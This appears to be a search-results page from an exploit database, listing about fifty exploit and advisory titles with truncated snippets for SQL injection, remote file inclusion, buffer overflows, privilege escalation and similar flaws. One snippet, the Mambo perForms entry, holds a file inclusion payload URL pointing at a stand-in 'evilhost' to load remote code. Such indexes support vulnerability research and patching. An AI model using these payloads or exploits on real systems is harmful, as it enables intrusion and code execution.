41207 matches found
ChaosPro 2.0 - Buffer Overflow (SEH)
ChaosPro 2.0 - Buffer Overflow SEH Exploit Title: ChaosPro 2.0 - Buffer Overflow SEH Date: 2019-10-27 Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://www.chaospro.de/ Software link: http://www.chaospro.de/cpro20.zip Version: 2.0 Tested on: Windows XP Pro OEM !/usr/bin/env python2 impo...
Windows PowerShell ISE - Remote Code Execution
Windows PowerShell ISE - Remote Code Execution + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt + ISR: ApparitionSec + Zero Day Initiative Program Vendor...
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape
Oracle VirtualBox 5.1.30 5.2-rc1 - Guest to Host Escape SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities Source: https://blogs.securiteam.com/index.php/archives/3649 Vulnerabilities summary The following advisory describes two 2 guest to host escape found in Oracle...
GraphicsMagick - Memory Disclosure Heap Overflow
GraphicsMagick - Memory Disclosure Heap Overflow '''Vulnerabilities summary The following advisory describes two 2 vulnerabilities found in GraphicsMagick. GraphicsMagick is “The swiss army knife of image processing. Comprised of 267K physical lines according to David A. Wheeler’s SLOCCount of...
TrendMicro InterScan Web Security Virtual Appliance - Shellshock Remote Command Injection
TrendMicro InterScan Web Security Virtual Appliance - Shellshock Remote Command Injection !/usr/bin/env python TrendMicro InterScan Web Security Virtul Appliance ================================================== InterScan Web Security is a software virtual appliance that dynamically protects...
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application Discovered by Pedro Ribeiro [email protected], Agile Information Security...
Exim 4.86.2 - Local Privilege Escalation
Exim 4.86.2 - Local Privilege Escalation ============================================= - Advisory release date: 10.03.2016 - Created by: Dawid Golunski - Severity: High/Critical ============================================= I. VULNERABILITY ------------------------- Exim 4.86.2 Local Root Privile...
Fork CMS 3.8.5 - SQL Injection
Fork CMS 3.8.5 - SQL Injection CVE-2015-1467 Fork CMS - SQL Injection in Version 3.8.5 ---------------------------------------------------------------- Product Information: Software: Fork CMS Tested Version: 3.8.5, released on Wednesday 14 January 2015 Vulnerability Type: SQL Injection CWE-89...
Linux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation
Linux Kernel 3.14.5 CentOS 7 RHEL - libfutex Local Privilege Escalation / CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 By Kaiqu Chen [email protected] Based on libfutex and the expoilt for Android by GeoHot. Usage: $gcc exploit.c -o exploit -lpthread $./exploit / include include include include...
vsftpd 2.3.2 - Denial of Service
vsftpd 2.3.2 - Denial of Service include include include include include include include / This is code of http://cxib.net/stuff/vspoc232.c PoC CVE-2011-0762 vsftpd Remote Denial of Service Affected: 2.3.2 Fix: 2.3.4 Author: Maksymilian Arciemowicz Use: ./vspoc232 127.0.0.1 21 user pass 1 or read...
FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution
FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution Trustwave's SpiderLabs Security Advisory TWSL2010-005: FreePBX recordings interface allows remote code execution https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt Published: 2010-09-23 Version: 1.0 Vendor: FreePBX...
Advaced-Clan-Script 3.4 - mcf.php Remote File Inclusion
Advaced-Clan-Script 3.4 - mcf.php Remote File Inclusion .. | /| | \ / // | | | \ / // | | Y \ //\ \ | || / / / / discovered by xdh Critical Level: Dangerous Class: Remote File Inclusion Venedor site: http://avc.x.philipwette.de/ Version: AdVancedClanscript 3.4 VUln: Filename: mcf.php Line:...
PHPCOIN 1.2.3 - session_set.php Remote File Inclusion
PHPCOIN 1.2.3 - sessionset.php Remote File Inclusion phpCOIN 1.2.3 CCFGPKGPATHINCL Remote Include Vulnerability Discovered by: Timq http://www.securitydb.org Email: timqathackernetworkdotcom http://www.securitydb.org Vulnerable: requireonce include $CCFG'PKGPATHINCL'.'redirect.php'; Exploit PoC:...
Hospital Management System 4.0 - searchdata SQL Injection
Hospital Management System 4.0 - searchdata SQL Injection Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link:...
Microsoft Windows Server 2012 - Group Policy Remote Code Execution
Microsoft Windows Server 2012 - Group Policy Remote Code Execution Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution Date: 2019-10-28 Exploit Author: Thomas Zuk Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,...
Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)
Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page 1 // EDB Note: Source https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0 // EDB Note: Source https://github.com/bindecy/HugeDirtyCowPOC // Author Note: Before running, make sure to set transparent huge pages to...
Avaya IP Office (IPO) 10.1 - ActiveX Buffer Overflow
Avaya IP Office IPO 10.1 - ActiveX Buffer Overflow + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt + ISR: ApparitionSec Vendor: =============...
Nuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)
Nuxeo 6.07.17.27.3 - Remote Code Execution Metasploit =begin Description Nuxeo Platform is a content management system for enterprises CMS. It embeds an Apache Tomcat server, and can be managed through a web interface. One of its features allows authenticated users to import files to the platform...
WSO2 Carbon 4.4.5 - Local File Inclusion
WSO2 Carbon 4.4.5 - Local File Inclusion + Credits: John Page aka HYP3RLINX + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt + ISR: ApparitionSec Vendor: =============== www.wso2.com Product: ====================...
DUportal Pro 3.4 - cat.asp Multiple SQL Injections
DUportal Pro 3.4 - cat.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could...
Webmin 1.910 - Package Updates Remote Command Execution (Metasploit)
Webmin 1.910 - Package Updates Remote Command Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin Package Updates Remote Command Execution', 'Description' = %q This modu...
Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script
Spidermonkey - IonMonkey Leaks JSOPTIMIZEDOUT Magic Value to Script IonMonkey can, during a bailout, leak an internal JSOPTIMIZEDOUT magic value to the running script. This magic value can then be used to achieve memory corruption. Prerequisites Magic Values Spidermonkey represents JavaScript...
Apple macOS 10.13.5 - Local Privilege Escalation
Apple macOS 10.13.5 - Local Privilege Escalation import import import import import import import "offsets.h" //utils define ENFORCEa, label \ do \ if builtinexpect!a, 0 \ \ timedlog"! %s is false l.%d\n", a, LINE; \ goto label; \ \ while 0 // from...
Dup Scout Enterprise 10.0.18 - Import Command Local Buffer Overflow
Dup Scout Enterprise 10.0.18 - Import Command Local Buffer Overflow !/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Dup Scout Enterprise v10.0.18 "Import Comman...
Automated Logic WebCTRL 6.5 - Unrestricted File Upload Remote Code Execution
Automated Logic WebCTRL 6.5 - Unrestricted File Upload Remote Code Execution !/usr/bin/env python -- coding: utf8 -- Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution Vendor: Automated Logic Corporation Product web page: http://www.automatedlogic.com Affected version: ALC...
PHP 5.5.375.6.237.0.8 - bzread() Out-of-Bounds Write
PHP 5.5.375.6.237.0.8 - bzread Out-of-Bounds Write ''' PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in its bzread' function: php-7.0.8/ext/bz2/bz2.c ,---- | 364 static PHPFUNCTIONbzread | 365 | ... | 382 ZSTRLENdata = phpstreamreadstream, ZSTRVALdata, ZSTRLENdata; | 383...
SafeNet Sentinel Protection Server 7.0 7.4 Sentinel Keys Server 1.0.3 1.0.4 - Directory Traversal
SafeNet Sentinel Protection Server 7.0 7.4 Sentinel Keys Server 1.0.3 1.0.4 - Directory Traversal !/usr/bin/python Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal Date: 04/28/2014 Exploit Author: Matt Schmidt Syph0n Vendor...
Oracle Application Framework - Diagnostic Mode Bypass
Oracle Application Framework - Diagnostic Mode Bypass Trustwave SpiderLabs Security Advisory TWSL2012-023: Oracle Application Framework Diagnostic Mode Bypass Vulnerability Published: 1/15/2013 Version: 1.0 Vendor: Oracle www.oracle.com Product: Oracle Application Framework Version affected:...
Freefloat FTP Server - PUT Remote Buffer Overflow
Freefloat FTP Server - PUT Remote Buffer Overflow !/usr/bin/python TitleFreefloat FTP Server PUT Command Buffer Overflow Discovered and Reported22nd of September, 2012 Discovered/Exploited ByJacob Holcomb/Gimppy042 Software Vendorhttp://www.freefloat.com/ CVE for PUT OverflowCVE-2012-5106...
PHP 5.3.8 - Hashtables Denial of Service
PHP 5.3.8 - Hashtables Denial of Service Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit Date: 1/1/12 Author: infodox Software Link: php.net Version: 5.3. Tested on: Linux CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt...
groones Guestbook 2.0 - Remote File Inclusion
groones Guestbook 2.0 - Remote File Inclusion GBOOK v2.0 Remote File Include Vulnerability http://www.groonesworld.com/programs/gbook/gbook.zip ======================================================== Author: k3vin mitnick tunisianblackhat team = = Home : http://tunisianblackhat.com &...
FAQ Management Script - catid SQL Injection
FAQ Management Script - catid SQL Injection || | | FAQ Management catid Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | | | script :...
Mambo Component perForms 1.0 - Remote File Inclusion
Mambo Component perForms 1.0 - Remote File Inclusion ------------------------------------------------------------------------ --- perForms founds 12.000 sites ! http://www.vuln.com/components/comperforms/performs.php?mosConfigabsolutepath=http://evilhost Fix Add before code: defined'VALIDMOS' or...
Easy Message Board - Directory Traversal
Easy Message Board - Directory Traversal source: https://www.securityfocus.com/bid/13551/info Easy Message Board is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root...
Sysax Multi Server 5.50 - Denial of Service (PoC)
Sysax Multi Server 5.50 - Denial of Service PoC Exploit Title: Sysax Multi Server 5.50 - Denial of Service PoC Google Dork: NA Date: 2020-01-20 Exploit Author: Shailesh Kumavat Vendor Homepage: https://www.sysax.com/ Software Link: https://www.sysax.com/download.htmsysaxserv Version: Sysax Multi...
Lenovo Power Management Driver 1.67.17.48 - pmdrvs.sys Denial of Service (PoC)
Lenovo Power Management Driver 1.67.17.48 - pmdrvs.sys Denial of Service PoC Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service PoC Date: 2019-12-11 Exploit Author: Nassim Asrir CVE: CVE-2019-6192 Tested On: Windows 1064bit | ThinkPad T470p Vendor :...
Joomla! 3.7.0 - com_fields SQL Injection
Joomla! 3.7.0 - comfields SQL Injection Exploit Title: Joomla 3.7.0 - Sql Injection Date: 05-19-2017 Exploit Author: Mateus Lino Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html Vendor Homepage: https://www.joomla.org/ Version: = 3.7.0 Tested on: Win, Kali...
GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution
GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution ============================================= - Release date: 06.07.2016 - Discovered by: Dawid Golunski - Severity: High - CVE-2016-4971 ============================================= I. VULNERABILITY ------------------------- GNU Wget...
web2Project 3.1 - Multiple Vulnerabilities
web2Project 3.1 - Multiple Vulnerabilities Advisory ID: HTB23213 Product: web2Project Vendor: http://web2project.net Vulnerable Versions: 3.1 and probably prior Tested Version: 3.1 Advisory Publication: April 30, 2014 without technical details Vendor Notification: April 30, 2014 Vendor Patch: May...
Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting
Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting Advisory ID: HTB23194 Product: Komento Joomla Extension Vendor: Stack Ideas Sdn Bhd. Vulnerable Versions: 1.7.2 and probably prior Tested Version: 1.7.2 Advisory Publication: January 2, 2014 without technical details Vendor...
Linux Kernel 2.6.36.2 (Ubuntu 10.04) - Half-Nelson.c Econet Privilege Escalation
Linux Kernel 2.6.36.2 Ubuntu 10.04 - Half-Nelson.c Econet Privilege Escalation / half-nelson.c Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848 Stack-based buffer overflow in the econetsendmsg function in net/econet/afeconet.c in the...
WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)
WeBid 1.0.2 - Persistent Cross-Site Scripting via SQL Injection Exploit Title: presistent XSS through SQLi WeBid 1.0.2 Google Dork: "powered by WeBid" Date: 15-06-2011 Author: Saif El-Sherei Software Link: http://sourceforge.net/projects/simpleauction/ Version: 1.0.2 Tested on: Firefox 4, XAMPP...
PHP Captcha Securimage 2.0.2 - Authentication Bypass
PHP Captcha Securimage 2.0.2 - Authentication Bypass Sense of Security - Security Advisory - SOS-11-007 Release Date. 20-May-2011 Last Update. - Vendor Notification Date. 04-Apr-2011 Product. Securimage / PHPCaptcha Platform. PHP Affected versions. 1.0.4 - 2.0.2 Severity Rating. Medium Impact...
PHPDug 2.0.0 - Multiple Vulnerabilities
PHPDug 2.0.0 - Multiple Vulnerabilities Vulnerability ID: HTB22971 Reference: http://www.htbridge.ch/advisory/xsrfcsrfinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability...
WSN Links - SQL Injection
WSN Links - SQL Injection 'WSN Links' SQL Injection Vulnerability CVE-2010-4006 Mark Stanislav - [email protected] I. DESCRIPTION --------------------------------------- A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portion...
Nucleus Plugin Gallery - Remote File Inclusion SQL Injection
Nucleus Plugin Gallery - Remote File Inclusion SQL Injection ============================================================================================================= o Nucleus Plugin Gallery RFI & SQLi Vulnerability Software : NPGallery version 0.94 Download :...
phpRealty 0.02 - MGR Multiple Remote File Inclusions
phpRealty 0.02 - MGR Multiple Remote File Inclusions |-------------------------------------------------------------------------------| | | | phpRealty 0.02 MGR Remote File include | | | | Script : phpRealty | | Version : 0.02 | | Authord : QTRinux | | Contact : Qataro at hotmail dot com | | Vendo...
ProductCart 1.x2.x - advSearch_h.asp Multiple SQL Injections
ProductCart 1.x2.x - advSearchh.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could...
Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Google Dork: N/A Date: 2020-03-05 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link:...
CAMALEON CMS 2.4 - Cross-Site Scripting
CAMALEON CMS 2.4 - Cross-Site Scripting Exploit Title: CAMALEON CMS 2.4 - Cross-Site Scripting Date: 2018-10-11 Exploit Author: Ismail Tasdelen Vendor Homepage: http://camaleon.tuzitio.com/ Software Link : https://github.com/owen2345/camaleon-cms Software : CAMALEON CMS Version : 2.4 Vulernabilit...